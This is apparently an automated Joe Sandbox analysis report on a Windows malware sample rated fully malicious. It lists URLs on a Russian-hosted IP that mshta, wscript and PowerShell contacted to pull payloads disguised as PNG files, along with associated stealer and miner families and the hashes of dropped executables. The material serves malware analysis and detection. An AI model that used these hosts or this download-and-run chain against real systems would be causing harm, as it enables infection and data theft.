                              http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2240161447.0000015F81A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF642AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.0000026810074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026801A70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.00000268101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://176.113.115.178/Windows-UpdateLMEMwscript.exe, 00000009.00000003.2252773588.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252932375.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252120336.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2256210413.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000005.00000002.2240161447.0000015F80C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF63B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026800C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.2287325300.000002B01D800000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.ver)svchost.exe, 0000000E.00000002.2763422288.000002B01D686000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://176.113.115.178/Windows-UpdateWinsta0mshta.exe, 0000000C.00000002.2308438812.000002A6CAAD0000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://176.113.115.178/Windows-Update/...mshta.exe, 0000000C.00000003.2298038675.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307546344.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308819002.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://176.113.115.178/Windows-Update/C:mshta.exe, 0000000C.00000002.2308601542.000002A6CAB66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307499590.000002A6CAB63000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://176.113.115.178/Windows-Update/Dmshta.exe, 0000000C.00000003.2289380947.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://176.113.115.178/Windows-Update/Fmshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.protware.commshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://176.113.115.178/Windows-Update$Emshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://176.113.115.178/Windows-Updatei%%%%%n%%%g(wscript.exe, 00000009.00000002.2255456357.0000022C1EE10000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://176.113.115.178/FF/2.pngXpowershell.exe, 00000005.00000002.2240161447.0000015F80C31000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000E.00000003.2287325300.000002B01D85E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://176.113.115.178/Windows-Update/lmshta.exe, 0000000C.00000003.2289380947.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.113.115.178/FF/1.png$TC=$TC.replace(mshta.exe, 0000000C.00000003.2298065296.000002AECCF85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2298938783.000002AECCF86000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2299398377.000002AECCF87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2296225919.000002AECCF83000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2299546441.000002AECCF89000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.113.115.178/Windows-Update/nmshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.113.115.178/Windows-UpdateUmshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.113.115.178/Windows-Updateaiwscript.exe, 00000009.00000002.2256453688.0000022C20C90000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://176.113.115.178/Windows-Updated.exjmshta.exe, 0000000C.00000002.2309157369.000002A6CAD60000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://176.113.115.178/Windows-Updatemshtamshta.exe, 0000000C.00000002.2308438812.000002A6CAAD0000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://176.113.1150wscript.exe, 00000004.00000003.2188071581.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2187242940.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2194375546.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2189720210.000001D049241000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://176.113.115.178/FF/CMD.pngpowershell.exe, 00000005.00000002.2240161447.0000015F81670000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://176.113.115.178/Windows-Update/amshta.exe, 0000000C.00000003.2299936329.000002AECCF8D000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.2240161447.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF628D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2349548172.000001D12D181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://176.113.115.178powershell.exe, 00000005.00000002.2240161447.0000015F81670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240161447.0000015F81631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF63F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF63B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026801668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.00000268019D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026801631000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://176.113.115.178/Windows-Updateemshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://176.113.115.178/Windows-Updateqmshta.exe, 0000000C.00000002.2308438812.000002A6CAAD0000.00000004.00000020.00020000.00000000.sdmptrue
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          176.113.115.178
                                                          		unknownRussian Federation
                                                          		49505SELECTELRUtrue

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1577458
                                                          Start date and time:2024-12-18 13:48:09 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 11m 2s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:61
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:5
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:file.exe
                                                          Detection:MAL
                                                          Classification:mal100.spyw.expl.evad.winEXE@74/28@0/2
                                                          EGA Information:
                                                          • Successful, ratio: 46.7%
                                                          HCA Information:
                                                          • Successful, ratio: 66%
                                                          • Number of executed functions: 147
                                                          • Number of non-executed functions: 307
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.35.236.109, 13.107.246.63, 20.31.169.57, 20.12.23.50, 40.126.53.12, 20.190.177.23, 2.16.158.186, 20.223.35.26, 150.171.27.10, 2.16.158.176, 4.245.163.56
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                                          • Execution Graph export aborted for target file.exe, PID 6492 because it is empty
                                                          • Execution Graph export aborted for target mshta.exe, PID 7444 because there are no executed function
                                                          • Execution Graph export aborted for target powershell.exe, PID 404 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7784 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 936 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: file.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          07:49:08API Interceptor236x Sleep call for process: powershell.exe modified
                                                          07:49:16API Interceptor225x Sleep call for process: svchost.exe modified
                                                          07:49:16API Interceptor1x Sleep call for process: mshta.exe modified
                                                          07:50:36API Interceptor19197x Sleep call for process: winlogon.exe modified
                                                          07:50:37API Interceptor11120x Sleep call for process: lsass.exe modified
                                                          07:50:38API Interceptor870x Sleep call for process: dialer.exe modified
                                                          07:50:42API Interceptor101x Sleep call for process: dwm.exe modified
                                                          07:50:43API Interceptor36x Sleep call for process: WmiPrvSE.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          176.113.115.178file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                          • 176.113.115.178/M.png
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 176.113.115.178/FF/M.png

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ax-0001.ax-msedge.netR0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                          • 150.171.28.10
                                                          index.html.docxGet hashmaliciousUnknownBrowse
                                                          • 150.171.27.10
                                                          99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                          • 150.171.28.10
                                                          Opdxdyeul.exeGet hashmaliciousSystemBCBrowse
                                                          • 150.171.27.10
                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                          • 150.171.28.10
                                                          PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                          • 150.171.28.10
                                                          pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                          • 150.171.27.10
                                                          billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exeGet hashmaliciousMetasploitBrowse
                                                          • 150.171.28.10
                                                          https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                                                          • 150.171.27.10

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          SELECTELRUInstallSetup.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                          • 176.113.115.178
                                                          rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19
                                                          XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                          • 176.113.115.19

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\ProgramData\Mig\Mig.exeYSU1PShcKh.exeGet hashmaliciousUnknownBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              C:\Users\user\AppData\Roaming\LB31.exeYSU1PShcKh.exeGet hashmaliciousUnknownBrowse
                                                                file.exeGet hashmaliciousUnknownBrowse

                                                                  Created / dropped Files

                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                  Download File
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8192
                                                                  Entropy (8bit):0.35901589905449205
                                                                  Encrypted:false
                                                                  SSDEEP:6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
                                                                  MD5:C788EDB928436D0CE10A5BF198837D8A
                                                                  SHA1:F104B6AB797E0B16362BFB69F5000407CE6EFFD8
                                                                  SHA-256:E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
                                                                  SHA-512:61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
                                                                  Malicious:false
                                                                  Preview:*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                  Download File
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1310720
                                                                  Entropy (8bit):0.7304559054061529
                                                                  Encrypted:false
                                                                  SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0z:9JZj5MiKNnNhoxue
                                                                  MD5:384077B9DA38069E86D4F62471FAC087
                                                                  SHA1:5A09671C03F4984AFDC431DF46659128829D26A1
                                                                  SHA-256:478103389BF029047A5B70DE14132A2B7E8113C09E802EE78D16C1E70B7D6E19
                                                                  SHA-512:623242DBF063612257F4DCAAAB23492FCC72748AD3439EE1D6E76C2AE8D96CD24B8B770C091F96C0C4E6CDFCBD9873FD7687240C0E96EB80C6F67F94D9C0DB60
                                                                  Malicious:false
                                                                  Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                  Download File
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0x174494f0, page size 16384, Windows version 10.0
                                                                  Category:dropped
                                                                  Size (bytes):1310720
                                                                  Entropy (8bit):0.6291525008124815
                                                                  Encrypted:false
                                                                  SSDEEP:1536:XSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Xaza9iJa+2UtmOQOL
                                                                  MD5:6E09AC636A9558E76A091EF747A45E01
                                                                  SHA1:A98CDFBCCAC9397475277E33A20935221A6F03E2
                                                                  SHA-256:A312E083D1E845DF724725DD0DF0351B7FB3ADFCBA912276CA9D04AAB87D237D
                                                                  SHA-512:C219D6568AC79388A1E272A65B15387CE8AA4483EB466B88FCAF041E3B3D99532E3A2EF81BBE076749C95A56800F1455320A177CB3604B05AACB670FB4D8ED19
                                                                  Malicious:false
                                                                  Preview:.D..... .......P.......X\...;...{......................0.j......2...|...1...|3.h.g......2...|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{.....................................;.2...|...................E.a.2...|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                  Download File
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):16384
                                                                  Entropy (8bit):0.07880683543203926
                                                                  Encrypted:false
                                                                  SSDEEP:3:8WsetYeCqXel/lsp3pZTp33ewQel/lNE8pZZel/lAllHol///lZMPCyH:PlzHXeXsZ39eQXNzZeXApo5
                                                                  MD5:CB11C80A13B4749775BDBD34BECBD436
                                                                  SHA1:4A4AA91F14D553E8B79787212A67DF7C66658312
                                                                  SHA-256:D13AD5EA27E2FC6121667A1FC2247024366E13361C7BC58F815AB20BF04304D4
                                                                  SHA-512:36437C982983C682FE1A2FA7260EFDCB4EF89AE6891F5D375C08F8EB3B2816426004EB2B282A7675A9A5B3455B89C0D7EB6A626DF954124FB1A2B69815EB42E7
                                                                  Malicious:false
                                                                  Preview:..P......................................;...{...1...|Q..2...|...........2...|e..2...|...j.j.2...|...................E.a.2...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Mig\Mig.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\LB31.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):7679488
                                                                  Entropy (8bit):7.744308216067832
                                                                  Encrypted:false
                                                                  SSDEEP:196608:/UUPSHwaRhOgwVPj04wfOAlM69LJDuHF:dKHwgt+Pov7y
                                                                  MD5:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                                  SHA1:D881F97A1FE03F43BED2A9609EAE65531CF710CF
                                                                  SHA-256:A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
                                                                  SHA-512:9E90BCB64B0E1F03E05990CDEAD076B4C6E0B050932ECB953DAE50B7E92B823A80FC66D1FD8753591719E89B405757B2BF7518814BC6A19BB745124D1A691627
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                  Joe Sandbox View:
                                                                  • Filename: YSU1PShcKh.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...^n.e.........."..........xT...............@.....................................u...`...................................................U.......S.f... ..............."..............................`"..(................................................... . ..S.......R.................@....rsrc...f.....S.......R.............@....idata ......U.......S.............@... ..8...U.......S.............@...ndryujmp.p!..`...f!...S.............@...tnyudguu............*u.............@....pdata.I............,u.............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):226
                                                                  Entropy (8bit):5.355760272568367
                                                                  Encrypted:false
                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
                                                                  MD5:FC3575D5BE1A5405683DC33B66D36243
                                                                  SHA1:1C816D34B7D5B96E077DC3EF640BA8C7BA370502
                                                                  SHA-256:1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
                                                                  SHA-512:68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
                                                                  Malicious:true
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Windows-Update[1].htm

                                                                  Download File
                                                                  Process:C:\Windows\System32\mshta.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):161
                                                                  Entropy (8bit):4.980309038898113
                                                                  Encrypted:false
                                                                  SSDEEP:3:8ROFKGQIeNi1Xbvx9M84JxeCAIuREg7F6nmqDmqTLU4JYyMLDIVAbSWFq:AYSI0MXLxu2CAIuh7FUKq0uYyMLDIVAe
                                                                  MD5:DA90A75321A8193233003438B1DAB7A5
                                                                  SHA1:8F9F189590A922C4EBE5A735F85435DC362A1130
                                                                  SHA-256:DCC1653B695959F3F7B566F53A134C70BA8FF86C107527071E8828CFB94036DB
                                                                  SHA-512:EE8972F41FF5321B0F75756009CCD8E4EA69B1C241DF05F6CA29BE9C8A9BCBF06F3B07A24B9874BA666FC9704CC1EFDEE1ADC95EF2B5380C4269792D1F05E600
                                                                  Malicious:false
                                                                  Preview:<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="http://176.113.115.178/Windows-Update/">here</a></body>

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\Windows-Update[1].htm

                                                                  Download File
                                                                  Process:C:\Windows\System32\mshta.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):10664
                                                                  Entropy (8bit):6.134513776825802
                                                                  Encrypted:false
                                                                  SSDEEP:192:+YKhyHCOb7CpMLu0MrjudlN/CuinQH934cGuTVMesKYVpTASADZEQljylBA7vlB:+YKvOfC6LuZHufRiQHSJDKAYWAH
                                                                  MD5:D1D2728A935CE257444EA29E2F415DDB
                                                                  SHA1:F1368BEEACD3A4D7B2028468882349B7F512ECB4
                                                                  SHA-256:7D54C72806EC720A53F26128BA22D8F261594FFB06BDEC8C1C0B6C8A33D3DBD9
                                                                  SHA-512:58ADDC3CB83D57E1827CF7A895025F8FE634CB8F28E5AFDC90895E0185235975D79B639A68DE74BD0442D7D5290DD4F8399137350B3380E0E7B2E54F90D103D3
                                                                  Malicious:false
